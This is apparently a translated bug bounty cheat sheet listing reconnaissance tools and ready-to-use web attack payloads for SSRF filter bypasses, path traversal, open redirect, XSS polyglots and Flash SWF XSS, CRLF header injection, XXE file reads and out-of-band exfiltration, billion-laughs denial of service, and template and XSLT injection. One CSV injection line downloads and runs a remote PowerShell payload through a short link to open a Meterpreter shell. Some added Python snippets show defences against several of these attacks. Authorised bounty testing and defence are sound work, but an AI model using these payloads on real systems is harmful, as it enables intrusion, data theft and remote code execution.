Bug Bounty (Crowdsourced Testing) Cheat Sheet

Date: 2022-05-06

From MoonFish, core member of the ChaMd5 security team

Preface

I have recently been reading bugbountyforum's interviews with bounty hunters and some slide decks in which people share their techniques, so, together with the bugbounty-cheatsheet project, I have organised the tools, methods and ideas they use. This is only a list and not very detailed; common techniques are not included, and it still needs to be filled in over time.

Bug bounty platforms

HackerOne, Bugcrowd, BountyFactory, Intigriti, Bugbountyjp, Synack, Zerocopter, Cobalt, Yogosha

Tools and a few tips

Online domain reconnaissance:

https://dnsdumpster.com
http://threatcrowd.org
https://publicwww.com (searches for domains inside JS and CSS; paid)
http://reverseip.domaintools.com (reverse IP, i.e. other hosts in the same C-class range)
https://mxtoolbox.com
https://virustotal.com
https://crt.sh/?q=%25.uber.com
https://google.com/transparencyreport/https/ct/
https://pentest-tools.com/information-gathering/google-hacking
https://censys.io/certificates?q=

Small tips for domain collection tools

Collect subdomains for several sites with sublist3r.py: the command below reads the sites from the domains file and writes each site's subdomains to a matching .txt file.

cat domains | xargs -n1 -I{} python sublist3r.py -d {} -o {}.txt

Extract domain names from an app with apktool and LinkFinder (provided the app is not encrypted or obfuscated):

apktool d app.apk; cd app; mkdir collection; find . -name '*.smali' -exec sh -c 'cp "$1" "collection/$(head /dev/urandom | md5sum | cut -d" " -f1).smali"' _ {} \; ; python /root/linkfinder/linkfinder.py -i 'collection/*.smali' -o cli
(the find -exec part copies every .smali file into collection/ under a random name, so that LinkFinder can scan them all at once; the random name has to be generated inside the inner shell, otherwise every file is copied to the same name)

Taking an app as an example

The full output can be found in output.html (LinkFinder's default output file; the -o cli option above prints to the terminal instead).

Simplified commands for Aquatone, the domain collection workhorse

Write the following to aqua.sh (the domain is passed as $1):
#!/bin/sh
aquatone-discover -d "$1" && aquatone-scan -d "$1" --ports huge && aquatone-takeover -d "$1" && aquatone-gather -d "$1"
Then run it: chmod +x aqua.sh && ./aqua.sh xx.com

Get every link on a page:

lynx -dump http://www.xxxxx.com/ | awk '/http/{print $2}'

Other tools that come up often: Intrigue-core, massdns, EyeWitness.

Vulnerability payloads and bypass techniques

SSRF:

http://0177.1/
http://0x7f.1/
https://520968996 (decimal form of the IP; computed with http://www.subnetmask.info/)
IPv6
http://[::1]
http://[::]

Wildcard DNS (for example, most of the SSRF vulnerabilities marked as fixed on WooYun could be bypassed this way):

http://xip.io
http://nip.io

Sites that log DNS resolutions and HTTP requests (similar to dnslog/ceye; for techniques see the FreeBuf article "HTTP blind attacks"):

http://dnsbin.zhack.ca (DNS)
http://pingb.in (DNS)
http://requestb.in (HTTP)
https://www.mockbin.org/ (HTTP)
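The octal, hex, decimal and IPv6 spellings above all reach the same addresses that a naive string blocklist misses, and the wildcard-DNS names do the same one step later. As an added example (not from the original page or the bugbounty-cheatsheet project), here is a Python check that canonicalises a URL's host the way inet_aton does and refuses loopback, private, link-local and unspecified targets; `classify_target` and its optional `resolve` callback are assumed names.

```python
import ipaddress
import re
from urllib.parse import urlsplit

def _inet_aton_part(part):
    """One dotted part as inet_aton reads it: 0x.. hex, leading 0 octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]*", part):
        return int(part, 8)
    if re.fullmatch(r"[1-9][0-9]*", part):
        return int(part, 10)
    return None

def canonical_ipv4(host):
    """Dotted-quad form of any inet_aton-style literal (0177.1, 0x7f.1, 520968996), else None."""
    vals = [_inet_aton_part(p) for p in host.split(".")]
    if not 1 <= len(vals) <= 4 or None in vals:
        return None
    *lead, last = vals
    # inet_aton rule: each leading part is one byte, the last part fills the remaining bytes
    if any(v > 0xFF for v in lead) or last >= 1 << (8 * (4 - len(lead))):
        return None
    n = 0
    for v in lead:
        n = (n << 8) | v
    return str(ipaddress.IPv4Address((n << (8 * (4 - len(lead)))) | last))

def _is_internal(addr):
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped          # ::ffff:127.0.0.1 is still loopback
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_reserved or addr.is_multicast)

def classify_target(url, resolve=None):
    """'blocked', 'allowed' or 'unresolved' for the host of a user-supplied URL. resolve
    (hypothetical hook) maps a name to every IP it has; all must pass, or 127.0.0.1.nip.io wins."""
    host = urlsplit(url).hostname
    if not host:
        return "blocked"
    try:
        addrs = [ipaddress.ip_address(canonical_ipv4(host) or host)]
    except ValueError:                   # not an IP literal in any spelling, so a name
        if resolve is None:
            return "unresolved"
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    if not addrs:
        return "unresolved"
    return "blocked" if any(_is_internal(a) for a in addrs) else "allowed"
```

The check covers only the address that is inspected: a name that changes its answer between this check and the actual fetch (DNS rebinding) still needs the HTTP client itself to connect to the vetted address.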

LFI:

../
../
/..
/..
/%5c..
FFmpeg local file disclosure (seen at Sohu, Youku and Tencent) (https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py)

OPEN REDIRECT:

/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
example.com%23@whitelisted.com (bypass)
Other payloads:
https://github.com/cujanovic/Open-Redirect-Payloads

XSS :

Xianzhi XSS challenge writeup: http://mp.weixin.qq.com/s/d_UCJusUdWCRTo3Vutsk_A

A general-purpose XSS polyglot payload:

jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e

Bypassing validation on URL fields:

javas&#x09;cript://www.google.com/%0Aalert(1)

Markdown XSS

[a](javascript:confirm(1)
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a]: (javascript:prompt(1))

FLASH SWF XSS

ZeroClipboard: ZeroClipboard.swf?id="))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
YUI "io.swf": io.swf?yid="));}catch(e){alert(document.domain);}//
YUI "uploader.swf": uploader.swf?allowedDomain=%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
AutoDemo: control.swf?onend=javascript:alert(1)//
Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);// (some Chinese frameworks, such as ThinkPHP, have had this problem)
Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf

AngularJS template injection

CRLF:

%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header
CRLF via redirects:
//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header
XSS via CRLF:
%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
Reference: https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.html
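The open-redirect list and the CRLF list above are the same input reaching a Location header. The following check is an added example (not part of the original page or the bugbounty-cheatsheet project): a redirect parameter is decoded to a fixed point, including the double-encoded and %u forms shown above, and only a plain same-origin path survives; `safe_redirect_target` and `fully_decode` are assumed names.

```python
import re
from urllib.parse import unquote, urlsplit

_UNICODE_ESC = re.compile(r"%u([0-9a-fA-F]{4})")   # IIS-style %u000a escape
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")           # CR, LF, TAB and the rest of C0

def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing (bounded), so /%250a and
    /%25%30%61 collapse to the raw line feed they hide; %uXXXX escapes are expanded too."""
    for _ in range(max_rounds):
        decoded = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), unquote(value))
        if decoded == value:
            break
        value = decoded
    return value

def safe_redirect_target(user_path):
    """Return user_path unchanged if it may go into a Location header, else None.
    Safe means a same-origin path: no scheme, no authority, no backslash and no
    control character in any encoding layer. The original (still encoded) string is
    returned because the decoded form must never be echoed into a header."""
    decoded = fully_decode(user_path)
    if _CONTROL.search(decoded) or "\\" in decoded:
        return None        # header injection, or /\evil.com style host confusion
    if not decoded.startswith("/") or decoded.startswith("//"):
        return None        # bare hosts and //evil.com are not relative paths
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc:
        return None        # javascript:, https:, and anything else with an authority
    return user_path
```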

CSV Injection:

%0A-3+3+cmd|' /C calc'!D2
Meterpreter shell:
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
Reference: http://bobao.360.cn/learning/detail/2997.html
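Neither payload above needs a bug in the exporting server: the spreadsheet does the damage when it opens the CSV. As an added example (not from the original page or the cheat sheet project), the writer below applies the usual defence, prefixing any cell a spreadsheet would evaluate, including the newline-led -3+3+cmd form, with a single quote so it stays text; `neutralize_cell` and `to_safe_csv` are assumed names.

```python
import csv
import io

# Leading characters that make Excel and LibreOffice evaluate a cell (OWASP CSV injection list)
FORMULA_TRIGGERS = ("=", "+", "-", "@")

def _is_plain_number(text):
    try:
        float(text)
        return True
    except ValueError:
        return False

def neutralize_cell(value):
    """Return the cell as text, prefixed with a single quote if a spreadsheet would run it.
    The trigger check skips leading whitespace and line breaks, which is what the
    %0A-3+3+cmd|... payload relies on once a naive writer splits it onto a new row.
    Genuine numbers such as -3 are left alone so exported columns stay numeric."""
    text = str(value)
    if _is_plain_number(text):
        return text
    if text.lstrip(" \t\r\n").startswith(FORMULA_TRIGGERS) or text[:1] in ("\t", "\r"):
        return "'" + text
    return text

def to_safe_csv(rows):
    """Serialise rows with every field neutralised and quoted (embedded quotes doubled)."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()
```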

XXE Injection:

File read:

<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
Out-of-band exfiltration (the first request returns no data):
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
PHP example:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>

Detecting SSRF:

<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>

XEE (denial of service, https://yq.aliyun.com/articles/8723):

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
XEE (remote attack):
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz>

Transferring the data over the FTP protocol (file read and directory listing on a Sogou site: blind XXE in a Java environment)

Details: http://www.freebuf.com/articles/web/97833.html

https://github.com/RUB-NDS/DTD-Attacks
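Every XXE variant above, from the file read to the billion-laughs expansion, begins with a DOCTYPE. As an added example (not from the original page or the cheat sheet project), the parser below uses the standard-library expat bindings to refuse any document that declares a DTD, an entity or an external reference before anything is resolved; `parse_without_dtd` and `is_rejected` are assumed names, and the sample documents are constructed from the payloads on this page.

```python
import xml.parsers.expat as expat

class UnsafeXML(ValueError):
    """Raised when a document uses DTD features a plain data API never needs."""

def parse_without_dtd(data):
    """Parse data (str or bytes) and return (root_tag, concatenated_text).
    Any DOCTYPE, entity declaration or external entity reference aborts the parse
    before expat resolves anything, so file://, php://filter and the out-of-band URL
    are never fetched and the lol1..lol9 expansion never starts."""
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)  # belt and braces

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} not allowed")

    def reject_entity(*decl):
        raise UnsafeXML("entity declaration not allowed")

    def reject_external(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity {sysid!r} not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external

    found = {"root": None, "text": []}
    def on_start(tag, attrs):
        if found["root"] is None:
            found["root"] = tag
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = found["text"].append
    parser.Parse(data, True)
    return found["root"], "".join(found["text"])

def is_rejected(data):
    """True when parse_without_dtd refuses the document (or it is not well-formed XML)."""
    try:
        parse_without_dtd(data)
        return False
    except (UnsafeXML, expat.ExpatError):
        return True

# Constructed samples: the file-read payload and a two-level cut of the billion-laughs DTD
XXE_FILE_READ = ('<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
                 '<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>')
XXE_LAUGHS = ('<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
              '<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;">]><lolz>&lol1;</lolz>')
BENIGN = "<foo><result>plain data</result></foo>"
```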

Template injection:

Ruby
<%=`id`%>
Twig
{{7*'7'}} outputs 49
Jinja
{{7*'7'}} outputs 7777777

XSLT injection

Information gathering:

<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
    <body>
        <xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
        <xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
    </body>
</html>

PHP exploitation:

<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
    <body>
        <xsl:value-of name="bugbounty" select="php:function('phpinfo')"/>
    </body>
</html>

Closing remarks

This article was translated and summarised from the open source project bugbounty-cheatsheet (https://github.com/EdOverflow/bugbounty-cheatsheet/). The translator was pressed for time and has not verified it in detail, so if you find errors or want to contribute ideas, you can reach me on WeChat at bbqcms.